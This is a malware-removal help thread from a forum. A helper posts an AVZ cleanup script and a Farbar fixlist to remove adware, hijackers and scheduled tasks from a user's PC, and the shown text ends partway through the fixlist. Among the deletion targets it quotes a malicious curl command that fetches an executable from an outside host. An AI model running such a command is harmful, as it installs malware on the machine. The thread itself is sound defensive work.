After installing drivers, something else got downloaded as well. After that, the computer's performance dropped by about half. It started lagging more often, etc. Please help me get rid of them!
Dear Foxwill, thank you for posting on our forum!
Help with disinfecting your computer on VirusInfo.Info is provided completely free of charge. Helpers will respond to your request very shortly. To receive help, you need to provide scan logs from the Autologger utility; you can read more in the rules for submitting a help request.
Information
If you would like personal, guaranteed help with priority handling, use the paid service Помогите+.
If our site proves useful to you and you have the opportunity, please support the project.
Run the script in AVZ. The computer will reboot.
Code:
begin TerminateProcessByName('C:\Users\Огурцов\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\mineonepapkamainj\trz26F4.tmp'); StopService('0177541477233912mcinstcleanup'); StopService('swsedrvr_vw_1_10_0_25'); QuarantineFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\hnsn92F5.tmp', ''); QuarantineFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\knsw5C1E.tmpfs', ''); QuarantineFile('C:\Program Files (x86)\87684081-1477484938-11CB-A5D0-F6E7D98D013F\knsyC641.tmpfs', ''); QuarantineFile('C:\Program Files (x86)\87684081-1479991071-11CB-A5D0-F6E7D98D013F\knsA992.tmp', ''); QuarantineFile('C:\Program Files (x86)\amuleC\ed2k.exe', ''); QuarantineFile('C:\Program Files (x86)\IconRunner\MoneyBot.exe', ''); QuarantineFile('C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe', ''); QuarantineFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\QMUdisk64.sys', ''); QuarantineFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\softaal64.sys', ''); QuarantineFile('C:\Program Files (x86)\WeatherChickn\WeatherChickn.exe', ''); QuarantineFile('C:\Program Files (x86)\Youtube AdBlock\IEEF\qu_X9D.dll', ''); QuarantineFile('C:\Program Files\7Q9Q65LS95\4E7W8PR7O.exe', ''); QuarantineFile('C:\Program Files\ByteFence\ByteFence.exe', ''); QuarantineFile('c:\program files\bytefence\ByteFenceService.exe', ''); QuarantineFile('c:\program files\bytefence\rtop\bin\rtop_svc.exe', ''); QuarantineFile('C:\Program Files\UBar\UbarDriver.sys', ''); QuarantineFile('C:\Program Files\UBar\UbarService.exe', ''); QuarantineFile('C:\Program Files\UYV96CZO7J\T5PQVB4YQ.exe', ''); QuarantineFile('C:\ProgramData\Doubleing\Doubleing.exe', ''); QuarantineFile('C:\ProgramData\hdtask\hdtask.exe', ''); QuarantineFile('C:\ProgramData\Logic Handler\set.exe', ''); QuarantineFile('C:\ProgramData\NetworkPacketManitor\Nettrans.exe', ''); 
QuarantineFile('C:\Users\Огурцов\AppData\Local\DuckGo\duckgo.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Local\Hostinstaller\4266426696_monster.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Local\Kometa\StartButton\kometastartvx64.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Local\lumsystem\lumsystem.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Local\MailruSetup\MailruSetup.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Local\ScriptWriter\ScriptWriter.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Local\yc\Application\yc.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\LocalLow\SearchGo\searchgo.dll', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\Adobe\Manager.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\curl\curl.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\curl\curl_7_54.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\app.py', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\ml.py', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\mineonepapkamainj\trz26F4.tmp', ''); QuarantineFile('C:\Users\Огурцов\AppData\Roaming\WindowsUpdater\Updater.exe', ''); QuarantineFile('C:\Users\Огурцов\ReportSender\ReportSender.exe', ''); QuarantineFile('C:\WINDOWS\Microsoft\svchost.exe', ''); QuarantineFile('C:\WINDOWS\system32\drivers\swsedrvr_vw_1_10_0_25.sys', ''); QuarantineFile('C:\WINDOWS\SysWOW64\SearchProtectService.exe', ''); QuarantineFile('C:\WINDOWS\TEMP\017754~1.EXE', ''); QuarantineFileF('c:\program files (x86)\87684081-1451210377-11cb-a5d0-f6e7d98d013f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0); QuarantineFileF('c:\program files (x86)\87684081-1477484938-11cb-a5d0-f6e7d98d013f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0); QuarantineFileF('c:\program 
files (x86)\87684081-1479991071-11cb-a5d0-f6e7d98d013f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0); QuarantineFileF('c:\program files (x86)\amulec', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0); QuarantineFileF('c:\programdata\doubleing', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0); QuarantineFileF('c:\users\огурцов\appdata\local\hostinstaller', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', true, '', 0 , 0); QuarantineFileF('c:\users\огурцов\appdata\roaming\microsoft\systemcertificates\my\ctls\mineonepapkamainj', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0); DeleteFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\hnsn92F5.tmp', ''); DeleteFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\knsw5C1E.tmpfs', ''); DeleteFile('C:\Program Files (x86)\87684081-1477484938-11CB-A5D0-F6E7D98D013F\knsyC641.tmpfs', ''); DeleteFile('C:\Program Files (x86)\87684081-1479991071-11CB-A5D0-F6E7D98D013F\knsA992.tmp', ''); DeleteFile('C:\Program Files (x86)\amuleC\ed2k.exe', ''); DeleteFile('C:\Program Files (x86)\IconRunner\MoneyBot.exe', '32'); DeleteFile('C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe', ''); DeleteFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\QMUdisk64.sys', ''); DeleteFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\softaal64.sys', ''); DeleteFile('C:\Program Files (x86)\WeatherChickn\WeatherChickn.exe', ''); DeleteFile('C:\Program Files (x86)\Youtube AdBlock\IEEF\qu_X9D.dll', ''); DeleteFile('C:\Program Files\7Q9Q65LS95\4E7W8PR7O.exe', '32'); DeleteFile('C:\Program Files\ByteFence\ByteFence.exe', ''); DeleteFile('c:\program files\bytefence\ByteFenceService.exe', ''); DeleteFile('c:\program files\bytefence\rtop\bin\rtop_svc.exe', ''); DeleteFile('C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll', '32'); DeleteFile('C:\Program Files\UBar\UbarDriver.sys', ''); 
DeleteFile('C:\Program Files\UBar\UbarService.exe', ''); DeleteFile('C:\Program Files\UYV96CZO7J\T5PQVB4YQ.exe', '32'); DeleteFile('C:\ProgramData\Doubleing\Doubleing.exe', ''); DeleteFile('C:\ProgramData\hdtask\hdtask.exe', '32'); DeleteFile('C:\ProgramData\Logic Handler\set.exe', ''); DeleteFile('C:\ProgramData\NetworkPacketManitor\Nettrans.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Local\DuckGo\duckgo.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Local\Hostinstaller\4266426696_monster.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Local\Kometa\StartButton\kometastartvx64.exe', '64'); DeleteFile('C:\Users\Огурцов\AppData\Local\lumsystem\lumsystem.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Local\lumsystem\lumsystem.exe', '32'); DeleteFile('C:\Users\Огурцов\AppData\Local\MailruSetup\MailruSetup.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Local\ScriptWriter\ScriptWriter.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Local\yc\Application\yc.exe', '32'); DeleteFile('C:\Users\Огурцов\AppData\LocalLow\SearchGo\searchgo.dll', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\Adobe\Manager.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\curl\curl.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\curl\curl_7_54.exe -f -s -L http://eltugno.ru/f.exe -o "C:\Users\Огурцов\AppData\Roaming\curl\curl.exe"', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\curl\curl_7_54.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\app.py', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\ml.py', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\ml.py', '32'); DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', ''); DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '32'); DeleteFile('C:\Users\Огурцов\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\mineonepapkamainj\trz26F4.tmp', ''); 
DeleteFile('C:\Users\Огурцов\AppData\Roaming\WindowsUpdater\Updater.exe', ''); DeleteFile('C:\Users\Огурцов\ReportSender\ReportSender.exe', ''); DeleteFile('C:\WINDOWS\Microsoft\svchost.exe', ''); DeleteFile('C:\WINDOWS\system32\drivers\swsedrvr_vw_1_10_0_25.sys', ''); DeleteFile('C:\WINDOWS\SysWOW64\SearchProtectService.exe', ''); DeleteFile('C:\WINDOWS\TEMP\017754~1.EXE', ''); DeleteFile('http:\eltugno.ru\f.exe', ''); ExecuteFile('schtasks.exe', '/delete /TN "ByteFence" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor2" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "DuckGo Task" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "LumProcess" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\Multimedia\MailruSetup" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\Multimedia\Manager" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\Multimedia\ReportSender" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "One System Care Monitor" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "ScriptWriter" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "Soft installer" /F', 0, 15000, true); ExecuteFile('schtasks.exe', '/delete /TN "WindowsUpdater" /F', 0, 15000, true); DeleteService('0177541477233912mcinstcleanup'); DeleteService('ancykxdb'); DeleteService('anqnvoio'); DeleteService('apswdtxg'); DeleteService('aywzshgp'); DeleteService('backlh'); DeleteService('bbbudopp'); DeleteService('bcouyzjs'); DeleteService('bjsehlvo'); DeleteService('bozmbqij'); DeleteService('bpifnwbn'); DeleteService('bqgiiaih'); DeleteService('bycvkxab'); 
DeleteService('ByteFenceService'); DeleteService('chaeuizt'); DeleteService('cjsggimu'); DeleteService('coessqjo'); DeleteService('cvafeojm'); DeleteService('cytilizo'); DeleteService('czasafsn'); DeleteService('dbx'); DeleteService('dennzevk'); DeleteService('dkomupml'); DeleteService('Doubleing'); DeleteService('ebteumgs'); DeleteService('eclpjzhy'); DeleteService('ed2kidle'); DeleteService('eijcgadq'); DeleteService('ejdhbujs'); DeleteService('ejqmezgn'); DeleteService('exzpnbkc'); DeleteService('fikhcuvx'); DeleteService('flctpmkv'); DeleteService('fpozvpip'); DeleteService('fsppkmsm'); DeleteService('ftrievld'); DeleteService('ggbczjib'); DeleteService('grogkvul'); DeleteService('gypnyrpk'); DeleteService('hnybidnj'); DeleteService('hurqvgof'); DeleteService('hvmspoqn'); DeleteService('ilwmvcxg'); DeleteService('jlddrvts'); DeleteService('jqtdndvb'); DeleteService('jvtgngyq'); DeleteService('jwxbxmze'); DeleteService('khxlthud'); DeleteService('kvlyyfev'); DeleteService('lgsvhrfs'); DeleteService('LiveUpdateSvc'); DeleteService('lonekmwa'); DeleteService('lpodhrht'); DeleteService('lxhhogbx'); DeleteService('makmjdwm'); DeleteService('McComponentHostService'); DeleteService('mcqtjynl'); DeleteService('muiikavs'); DeleteService('naylrybp'); DeleteService('Nettrans'); DeleteService('nfhcuzwm'); DeleteService('nlwxeqhr'); DeleteService('nomsbdff'); DeleteService('nrbvdmvg'); DeleteService('nugobuse'); DeleteService('nvnprykv'); DeleteService('obzzxyvx'); DeleteService('ohxgsnag'); DeleteService('okiuazqx'); DeleteService('okvgqsba'); DeleteService('paplbcjx'); DeleteService('pejcktpo'); DeleteService('pkfahwgk'); DeleteService('pmpqtklp'); DeleteService('qfybyovi'); DeleteService('QMUdisk'); DeleteService('qnabfcdz'); DeleteService('qnyphnvj'); DeleteService('qprkqvxc'); DeleteService('qtvoxmki'); DeleteService('qxkidsjg'); DeleteService('rlzazkuc'); DeleteService('rngeiytu'); DeleteService('rtbhagez'); DeleteService('rtop'); DeleteService('rwzavqul'); 
DeleteService('ryshjglb'); DeleteService('snfbvbhr'); DeleteService('softaal'); DeleteService('sokylole'); DeleteService('SPS'); DeleteService('srbqkcgi'); DeleteService('SvcHost Service Host'); DeleteService('swsedrvr_vw_1_10_0_25'); DeleteService('tcuuadtw'); DeleteService('tdczeevt'); DeleteService('tddgzhju'); DeleteService('tglssguf'); DeleteService('tgrnveup'); DeleteService('thkzcpun'); DeleteService('tkskrchq'); DeleteService('TrueKeyScheduler'); DeleteService('TrueKeyServiceHelper'); DeleteService('txvipmsx'); DeleteService('tysjnfcx'); DeleteService('UbarCalloutDriver'); DeleteService('UbarPolicyProvider'); DeleteService('ufghthyv'); DeleteService('ujbugeqa'); DeleteService('umxkcunc'); DeleteService('uotgmlmb'); DeleteService('Updater.Mail.Ru'); DeleteService('UvConverter'); DeleteService('uxbsnitn'); DeleteService('uxgtprhf'); DeleteService('uzcxzozd'); DeleteService('WeatherChiknSrvr'); DeleteService('wfcgtqki'); DeleteService('wifpmdvy'); DeleteService('wssxrmyk'); DeleteService('wucotusy'); DeleteService('xdjbpzhr'); DeleteService('xdrveulz'); DeleteService('yiamwbab'); DeleteService('yrnymepm'); DeleteService('ytwykeaw'); DeleteService('zalvstec'); DeleteService('zazbfhvj'); DeleteFileMask('c:\program files (x86)\87684081-1451210377-11cb-a5d0-f6e7d98d013f', '*', true); DeleteFileMask('c:\program files (x86)\87684081-1477484938-11cb-a5d0-f6e7d98d013f', '*', true); DeleteFileMask('c:\program files (x86)\87684081-1479991071-11cb-a5d0-f6e7d98d013f', '*', true); DeleteFileMask('c:\program files (x86)\amulec', '*', true); DeleteFileMask('c:\program files (x86)\iconrunner', '*', true); DeleteFileMask('c:\program files (x86)\onesystemcare', '*', true); DeleteFileMask('c:\program files (x86)\tencent', '*', true); DeleteFileMask('c:\program files (x86)\weatherchickn', '*', true); DeleteFileMask('c:\program files (x86)\youtube adblock', '*', true); DeleteFileMask('c:\program files\7q9q65ls95', '*', true); DeleteFileMask('c:\program files\bytefence', '*', 
true); DeleteFileMask('c:\program files\ubar', '*', true); DeleteFileMask('c:\program files\uyv96czo7j', '*', true); DeleteFileMask('c:\programdata\doubleing', '*', true); DeleteFileMask('c:\programdata\hdtask', '*', true); DeleteFileMask('c:\programdata\logic handler', '*', true); DeleteFileMask('c:\programdata\networkpacketmanitor', '*', true); DeleteFileMask('c:\users\огурцов\appdata\local\duckgo', '*', true); DeleteFileMask('c:\users\огурцов\appdata\local\hostinstaller', '*', true); DeleteFileMask('c:\users\огурцов\appdata\local\lumsystem', '*', true); DeleteFileMask('c:\users\огурцов\appdata\local\mailrusetup', '*', true); DeleteFileMask('c:\users\огурцов\appdata\local\scriptwriter', '*', true); DeleteFileMask('c:\users\огурцов\appdata\local\yc', '*', true); DeleteFileMask('c:\users\огурцов\appdata\locallow\searchgo', '*', true); DeleteFileMask('c:\users\огурцов\appdata\roaming\curl', '*', true); DeleteFileMask('c:\users\огурцов\appdata\roaming\currencyconvertor', '*', true); DeleteFileMask('c:\users\огурцов\appdata\roaming\microsoft\systemcertificates\my\ctls\mineonepapkamainj', '*', true); DeleteFileMask('c:\users\огурцов\appdata\roaming\windowsupdater', '*', true); DeleteFileMask('c:\users\огурцов\reportsender', '*', true); DeleteDirectory('c:\program files (x86)\87684081-1451210377-11cb-a5d0-f6e7d98d013f'); DeleteDirectory('c:\program files (x86)\87684081-1477484938-11cb-a5d0-f6e7d98d013f'); DeleteDirectory('c:\program files (x86)\87684081-1479991071-11cb-a5d0-f6e7d98d013f'); DeleteDirectory('c:\program files (x86)\amulec'); DeleteDirectory('c:\program files (x86)\iconrunner'); DeleteDirectory('c:\program files (x86)\onesystemcare'); DeleteDirectory('c:\program files (x86)\tencent'); DeleteDirectory('c:\program files (x86)\weatherchickn'); DeleteDirectory('c:\program files (x86)\youtube adblock'); DeleteDirectory('c:\program files\7q9q65ls95'); DeleteDirectory('c:\program files\bytefence'); DeleteDirectory('c:\program files\ubar'); 
DeleteDirectory('c:\program files\uyv96czo7j'); DeleteDirectory('c:\programdata\doubleing'); DeleteDirectory('c:\programdata\hdtask'); DeleteDirectory('c:\programdata\logic handler'); DeleteDirectory('c:\programdata\networkpacketmanitor'); DeleteDirectory('c:\users\огурцов\appdata\local\duckgo'); DeleteDirectory('c:\users\огурцов\appdata\local\hostinstaller'); DeleteDirectory('c:\users\огурцов\appdata\local\lumsystem'); DeleteDirectory('c:\users\огурцов\appdata\local\mailrusetup'); DeleteDirectory('c:\users\огурцов\appdata\local\scriptwriter'); DeleteDirectory('c:\users\огурцов\appdata\local\yc'); DeleteDirectory('c:\users\огурцов\appdata\locallow\searchgo'); DeleteDirectory('c:\users\огурцов\appdata\roaming\curl'); DeleteDirectory('c:\users\огурцов\appdata\roaming\currencyconvertor'); DeleteDirectory('c:\users\огурцов\appdata\roaming\microsoft\systemcertificates\my\ctls\mineonepapkamainj'); DeleteDirectory('c:\users\огурцов\appdata\roaming\windowsupdater'); DeleteDirectory('c:\users\огурцов\reportsender'); DelBHO('{2BC46CFA-4B00-4193-A7BD-6AD1D0BCB5BC}'); DelBHO('{598AEFC6-DD3C-4A63-9AC3-53FCF6155931}'); DelBHO('{95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B}'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', '6GMTU8RLCT'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'aebleyzkpy'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'CurrencyConvertor'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'hdtask'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'K8J77YTFGJ'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'LumProcess'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'ycAutoLaunch_1C57F4F4FD8066828BC5E4D43E9AF813'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 
'APSDaemon'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'IconRunner'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 2, true); RebootWindows(false); end.
A quarantine archive, quarantine.zip, will appear in the AVZ folder; send this file using the "Send requested quarantine" link above the first post in the thread.
Download Farbar Recovery Scan Tool and save it to your Desktop.
Note: you need to choose the version compatible with your operating system. If you are not sure which version suits your system, download both and try to run them. Only one of them will run on your system.
Run the program. When the program starts, click Yes to accept the disclaimer.
Click the Scan button.
When the scan finishes, the reports FRST.txt and Addition.txt will be created in the same folder the program was run from.
Attach these files to your next post (preferably both in one archive).
WBR,
Vadim
Thank you very much, but what should I do after I have sent the quarantine archive? Wait for a reply?
Read my post to the end. And so far, instead of the quarantine, you have put in 1) AutoLogger itself and 2) its logs.
WBR,
Vadim
Please forgive my inattentiveness....
Here is the file
Open Notepad (Start => Programs => Accessories => Notepad). Copy the following code into it and save it as fixlist.txt in the folder with Farbar Recovery Scan Tool. When saving, choose the Unicode encoding!
Code:
CreateRestorePoint: CloseProcesses: HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\Run: [MailRuUpdater] => C:\Users\Огурцов\AppData\Local\Mail.Ru\MailRuUpdater.exe [4100312 2017-11-24] (Mail.Ru) <==== ATTENTION AppInit_DLLs: C:\ProgramData\ApppaznoR\Quadtofind.dll => No File AppInit_DLLs-x32: C:\ProgramData\ApppaznoR\Stim-Lam.dll => No File ShellExecuteHooks: No Name - {83922134-9CE0-11E6-9D68-64006A5CFC23} - C:\Users\Огурцов\AppData\Roaming\Mdolybuers\Huqoent.dll -> No File <==== ATTENTION ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.376\SSScheduler.exe (No File) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Zaxar Games Browser.lnk [2017-11-02] <==== ATTENTION ShortcutTarget: Zaxar Games Browser.lnk -> C:\Program Files (x86)\Zaxar\ZaxarLoader.exe (Zaxar LTD) <==== ATTENTION ShortcutTarget: ProfitTaskMonitor.lnk -> C:\Program Files (x86)\ProfitTask\ProfitTaskMonitor.exe (No File) GroupPolicy: Restriction - Chrome <==== ATTENTION GroupPolicy\User: Restriction - Chrome <==== ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Policies\Google: Restriction <==== ATTENTION HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.oursurfing.com/web/?type=ds&ts=1445087024&z=d486f1b5cbe2d9f121db6f9gaz8z0wce5bfm5e1ocz&from=amt&uid=wdcxwd5000lpvx-08v0tt5_wd-wxc1a34d4616d4616&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1478246974&z=2d729a5d79fdd8a964fb447gbz5m0b6oazeqatbq5m&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL 
= hxxp://www.amisites.com/?type=hp&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.oursurfing.com/web/?type=ds&ts=1445087024&z=d486f1b5cbe2d9f121db6f9gaz8z0wce5bfm5e1ocz&from=amt&uid=wdcxwd5000lpvx-08v0tt5_wd-wxc1a34d4616d4616&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1478246974&z=2d729a5d79fdd8a964fb447gbz5m0b6oazeqatbq5m&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms} HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWucbjwj6mzzJCvFqgp4F2dqqpnoYOs0vb2kBGtsNnrQmSzX4g4YVHHTW5j75Qxd6AUNHBycrlraEN1eWuVTdwSzwVHhsUbElK2OVNSYVd8hPOwbsDwNEb0FlSaal9sgmdDE_QgmcO47EyoULHAo_6i2UMVGJljdLPlwIi0rAAKeE,&q={searchTerms} HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616 HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://firstsputnik.ru/?ri=1&uid=ab3b05442b67d72976b82968da1b6bad&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM-x32 -> ielnksrch URL = 
hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWucbjwj6mzzJCvFqgp4F2dqqpnoYOs0vb2kBGtsNnrQmSzX4g4YVHHTW5j75Qxd6AUNHBycrlraEN1eWuVTdwSzwVHhsUbElK2OVNSYVd8hPOwbsDwNEb0FlSaal9sgmdDE_QgmcO47EyoULHAo_6i2UMVGJljdLPlwIi0rAAKeE,&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1478246974&z=2d729a5d79fdd8a964fb447gbz5m0b6oazeqatbq5m&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms} SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3D} URL = hxxp://firstsputnik.ru/?ri=1&uid=ab3b05442b67d72976b82968da1b6bad&q= SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.amisites.com/search/?type=ds&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms} SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {A06ED961-D98F-4CF9-A89B-80AB11DB149C} URL = hxxp://go-search.ru/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B1B60E205-BA95-469A-87F0-C2C71B3A6798%7D&gp=832418 SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {ielnksrch} URL = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWucbjwj6mzzJCvFqgp4F2dqqpnoYOs0vb2kBGtsNnrQmSzX4g4YVHHTW5j75Qxd6AUNHBycrlraEN1eWuVTdwSzwVHhsUbElK2OVNSYVd8hPOwbsDwNEb0FlSaal9sgmdDE_QgmcO47EyoULHAo_6i2UMVGJljdLPlwIi0rAAKeE,&q={searchTerms} BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll => No File BHO: Youtube AdBlock -> {95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} -> C:\Program Files 
(x86)\Youtube AdBlock\IEEF\6IrSQWjT.dll => No File BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll => No File BHO-x32: [email protected] -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\Огурцов\AppData\Local\Mail.Ru\Sputnik\ie_addon_dll.dll [2017-11-26] (Mail.Ru) BHO-x32: No Name -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> No File Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll No File FF Extension: (supermegabest) - C:\Users\Огурцов\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\[email protected] [2016-03-23] [Legacy] FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\autoconfig.js [2018-11-08] <==== ATTENTION (Points to *.cfg file) FF ExtraCheck: C:\Program Files\mozilla firefox\cck2.cfg 